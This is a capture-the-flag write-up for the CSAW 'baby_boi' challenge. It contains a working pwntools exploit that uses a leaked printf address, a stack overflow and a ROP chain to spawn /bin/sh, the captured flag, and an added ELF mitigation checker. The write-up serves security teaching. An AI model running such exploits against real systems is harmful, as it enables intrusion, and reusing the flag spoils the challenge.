Welcome to pwn.
nc pwn.chal.csaw.io 1005
The binary already leaks the address of printf, so we can easily calculate the libc base address. Then we overflow the buffer (no stack canaries enabled) and perform a ROP chain to execute the system function with the argument /bin/sh.
Exploit script:
from pwn import *

libc = ELF('libc-2.27.so')
rop = ROP('baby_boi')
POP_RDI_RET = rop.find_gadget(['pop rdi', 'ret'])[0]
RET = rop.find_gadget(['ret'])[0]

p = process('baby_boi')
# p = remote('pwn.chal.csaw.io', 1005)

# The binary prints printf's address; subtracting its libc offset gives the libc base.
data = p.recv()
libc_base = int(data.splitlines()[1].split(b' ')[3], 16) - libc.symbols['printf']
log.info('libc base: ' + hex(libc_base))
system = libc_base + libc.symbols['system']
log.info('system at: ' + hex(system))
binsh = libc_base + next(libc.search(b'/bin/sh'))
log.info('/bin/sh at: ' + hex(binsh))

# 40 bytes of padding reach the saved return address (no canary). The lone ret keeps the
# stack 16-byte aligned before system() runs; pop rdi then loads the "/bin/sh" pointer.
p.sendline(b'A' * 40 + p64(RET) + p64(POP_RDI_RET) + p64(binsh) + p64(system))
p.interactive()
flag: flag{baby_boi_dodooo_doo_doo_dooo}
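The writeup relies on the binary shipping without a stack canary and, since the gadget addresses from the ROP object are used as-is, without PIE. As an added, self-contained check that is not part of the original writeup, this pure-Python parser reads an ELF64 header and its program headers to report PIE (ET_DYN), NX (PT_GNU_STACK without PF_X) and RELRO; the build_elf helper and the HARDENED/WEAK images are constructed samples, and canary detection, which needs the dynamic symbol table (__stack_chk_fail), is deliberately out of scope.

```python
import struct

PT_GNU_STACK = 0x6474e551   # program header that records the stack's permissions
PT_GNU_RELRO = 0x6474e552   # program header marking the read-only-after-relocation region
PF_X = 0x1
ET_DYN = 3                  # shared object / PIE executable

def parse_mitigations(elf_bytes):
    """Report PIE, NX and RELRO for a little-endian ELF64 image held in memory."""
    if elf_bytes[:4] != b'\x7fELF' or elf_bytes[4] != 2:
        raise ValueError('not a 64-bit ELF image')
    # Fixed ELF64 header offsets: e_type@16, e_phoff@32, e_phentsize@54, e_phnum@56
    e_type = struct.unpack_from('<H', elf_bytes, 16)[0]
    e_phoff = struct.unpack_from('<Q', elf_bytes, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from('<HH', elf_bytes, 54)
    nx, relro = False, False   # a missing PT_GNU_STACK entry is treated as an executable stack
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from('<II', elf_bytes, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {'pie': e_type == ET_DYN, 'nx': nx, 'relro': relro}

def build_elf(e_type, phdrs):
    """Constructed sample: a minimal ELF64 header followed by (p_type, p_flags) entries."""
    phoff, phentsize = 64, 56
    ident = b'\x7fELF' + bytes([2, 1, 1, 0]) + b'\x00' * 8
    hdr = ident + struct.pack('<HHIQQQIHHHHHH', e_type, 0x3e, 1, 0, phoff, 0,
                              0, 64, phentsize, len(phdrs), 64, 0, 0)
    body = b''.join(struct.pack('<IIQQQQQQ', t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    return hdr + body

# Two constructed images: one with the protections on, one shaped like a no-PIE,
# executable-stack, no-RELRO binary.
HARDENED = build_elf(ET_DYN, [(PT_GNU_STACK, 0x6), (PT_GNU_RELRO, 0x4)])
WEAK = build_elf(2, [(PT_GNU_STACK, 0x7)])

if __name__ == '__main__':
    for name, image in (('hardened', HARDENED), ('weak', WEAK)):
        print(name, parse_mitigations(image))
```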